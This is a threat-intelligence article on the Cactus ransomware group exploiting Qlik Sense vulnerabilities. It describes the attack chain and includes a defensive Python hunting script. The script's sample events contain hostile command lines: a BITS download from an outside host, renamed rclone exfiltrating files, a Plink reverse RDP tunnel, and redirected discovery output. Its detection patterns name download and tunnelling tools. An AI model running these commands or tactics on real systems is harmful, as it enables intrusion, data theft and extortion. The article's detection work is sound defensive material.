EXECUTIVE SUMMARY:

The Cactus ransomware group is currently exploiting three security flaws in Qlik Sense, a data analytics platform (the affected product is the on-premises Windows version, Qlik Sense Enterprise for Windows), to gain initial access for ransomware attacks.

In the past, Cactus has targeted prominent commercial organizations worldwide, pressuring victims by publishing their names and brief descriptions on a dark web leak site.

To defend against the Qlik Sense threat, understand the Cactus group’s tactics, techniques and procedures (TTPs). Keep reading to learn more:

Critical vulnerabilities 

In August, Qlik released security updates for two vulnerabilities affecting Qlik Sense Enterprise for Windows. The first, tracked as CVE-2023-41266, is a path traversal flaw that lets an unauthenticated remote attacker generate an anonymous session and send HTTP requests to unauthorized endpoints.

The second, tracked as CVE-2023-41265 and rated critical (CVSS 9.8), is an HTTP request tunneling flaw that can be leveraged to elevate privileges and execute HTTP requests on the backend server hosting the application. It requires no authentication to exploit; in practice the two bugs are chained, with the anonymous session obtained through CVE-2023-41266 used to reach the tunneling flaw, which yields code execution on the server.

In September, Qlik found that the fix for CVE-2023-41265 was incomplete and could be bypassed, and released a further update; the bypass is tracked under a separate CVE.

According to a recent cyber security research report, the Cactus ransomware group is actively exploiting these flaws on publicly exposed Qlik Sense instances that remain unpatched.

Breach methodology explained

These Cactus attacks exploit the Qlik Sense vulnerabilities to execute code, which causes the Qlik Sense Scheduler service to spawn new processes.

The attackers then use PowerShell and the Background Intelligent Transfer Service (BITS) to download tools that establish persistence and provide remote access to the machine:

  • ManageEngine UEMS executables posing as Qlik files
  • AnyDesk obtained directly from the official website
  • A Plink (PuTTY Link) binary renamed to “putty.exe”

Cactus also runs numerous discovery commands and redirects their output into .TTF files; researchers believe this is how the attackers retrieve the command output, reading the files back through the path traversal flaw.

To remain hidden and gather information, Cactus also changes the administrator password and establishes an RDP tunnel with the Plink command-line SSH tool, among other actions.

In the final stage, the threat actors deploy the Cactus ransomware on the compromised system.

Additional attack information

Evidence also points to the attackers using RDP for lateral movement, WizTree for disk space analysis, and rclone, renamed ‘svchost.exe,’ for data exfiltration. These tools and techniques match the patterns researchers have observed in previous Cactus ransomware attacks.
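The behaviours described under “Breach methodology explained” and in the paragraph above (a shell spawned by the Qlik Sense Scheduler service, tool downloads via PowerShell and BITS, discovery output redirected to .TTF files, a Plink tunnel run as putty.exe, and rclone renamed svchost.exe) can each be turned into a hunting rule over process-creation telemetry. The following Python is an added example, not code from the research report or from this site; it runs over constructed Sysmon-style events (the paths, the 203.0.113.10 address and the command lines are invented, not indicators from the report), and the Scheduler.exe binary name and the System32/SysWOW64 path check are assumptions to adapt to your own environment.

```python
import ntpath
import re
from dataclasses import dataclass


@dataclass
class ProcEvent:
    """Minimal Sysmon Event ID 1 style record: ParentImage, Image, CommandLine."""
    parent_image: str
    image: str
    command_line: str


SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe"}
# Assumption: legitimate svchost.exe lives only in these directories.
SYSTEM_DIRS = {r"c:\windows\system32", r"c:\windows\syswow64"}


def base(path: str) -> str:
    # ntpath parses Windows paths correctly even when this runs on Linux.
    return ntpath.basename(path).lower()


def qlik_scheduler_spawns_shell(e: ProcEvent) -> bool:
    """Post-exploitation: the Qlik Sense Scheduler service starting a shell.
    Assumption: the service binary is Scheduler.exe under a ...\\Qlik\\... path."""
    return (base(e.parent_image) == "scheduler.exe"
            and "\\qlik\\" in e.parent_image.lower()
            and base(e.image) in SHELLS)


def download_via_bits_or_powershell(e: ProcEvent) -> bool:
    """Tool retrieval through BITS or common PowerShell download primitives."""
    return re.search(
        r"start-bitstransfer|bitsadmin(\.exe)?\s+/transfer|invoke-webrequest"
        r"|downloadfile|downloadstring",
        e.command_line, re.I) is not None


def svchost_outside_system_dir(e: ProcEvent) -> bool:
    """Masquerading: a file named svchost.exe (e.g. renamed rclone) run from
    anywhere other than the Windows system directories."""
    return (base(e.image) == "svchost.exe"
            and ntpath.dirname(e.image).lower() not in SYSTEM_DIRS)


def putty_plink_tunnel(e: ProcEvent) -> bool:
    """PuTTY/Plink started with a -R or -L port forward, as used for the RDP tunnel."""
    return (base(e.image) in {"putty.exe", "plink.exe"}
            and re.search(r"\s-[RL]\s+\S*:\d+", e.command_line) is not None)


def output_redirected_to_ttf(e: ProcEvent) -> bool:
    """Discovery command output redirected into a .ttf file."""
    return re.search(r'>>?\s*("[^"]*\.ttf"|\S+\.ttf)', e.command_line, re.I) is not None


RULES = [
    ("qlik_scheduler_spawns_shell", qlik_scheduler_spawns_shell),
    ("download_via_bits_or_powershell", download_via_bits_or_powershell),
    ("svchost_outside_system_dir", svchost_outside_system_dir),
    ("putty_plink_tunnel", putty_plink_tunnel),
    ("output_redirected_to_ttf", output_redirected_to_ttf),
]


def hunt(events):
    """Return (event index, rule name) for every rule each event trips."""
    return [(i, name) for i, e in enumerate(events) for name, rule in RULES if rule(e)]


# Constructed sample telemetry (invented paths, host and commands; not IOCs).
SAMPLE_EVENTS = [
    ProcEvent(r"C:\Program Files\Qlik\Sense\Scheduler\Scheduler.exe",
              r"C:\Windows\System32\cmd.exe",
              r'cmd.exe /c whoami /all > "C:\Program Files\Qlik\Sense\Client\out.ttf"'),
    ProcEvent(r"C:\Windows\System32\cmd.exe",
              r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r"powershell -c Start-BitsTransfer -Source http://203.0.113.10/q.zip -Destination C:\ProgramData\q.zip"),
    ProcEvent(r"C:\Windows\System32\cmd.exe",
              r"C:\ProgramData\svchost.exe",
              r"svchost.exe copy C:\Finance remote:bucket --transfers 8"),
    ProcEvent(r"C:\Windows\System32\cmd.exe",
              r"C:\ProgramData\putty.exe",
              r"putty.exe -ssh -R 0.0.0.0:3389:127.0.0.1:3389 user@203.0.113.10 -pw x"),
    # Benign control: the real svchost.exe started by the Service Control Manager.
    ProcEvent(r"C:\Windows\System32\services.exe",
              r"C:\Windows\System32\svchost.exe",
              r"svchost.exe -k netsvcs -p"),
]

if __name__ == "__main__":
    for idx, rule_name in hunt(SAMPLE_EVENTS):
        print(f"event {idx}: {rule_name}: {SAMPLE_EVENTS[idx].command_line}")
```

The rules are deliberately narrow: each keys on the combination the report describes (parent process plus child, file name plus location, binary plus argument shape) rather than on a file hash, so renaming or recompiling the tools does not evade them. The benign svchost.exe event is included to show that the masquerading rule does not fire on the genuine binary in System32.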

Cactus ransomware group insights

The Cactus ransomware group first appeared in March 2023 and has used double extortion from the outset: victims’ data is stolen before systems are encrypted, so the threat of publication adds pressure to pay.

Researchers have singled out this operation because the ransomware encrypts its own binary, shielding the malware from detection by security products.

This vulnerability disclosure comes as the ransomware landscape grows more sophisticated and the ransomware economy continues to scale.

To better protect your business, check out this CISO’s Guide to Ransomware prevention. Plus, explore advanced anti-ransomware technologies here. Lastly, to receive timely cyber security insights, exclusive interviews, and cutting-edge analyses, please sign up for the cybertalk.org newsletter.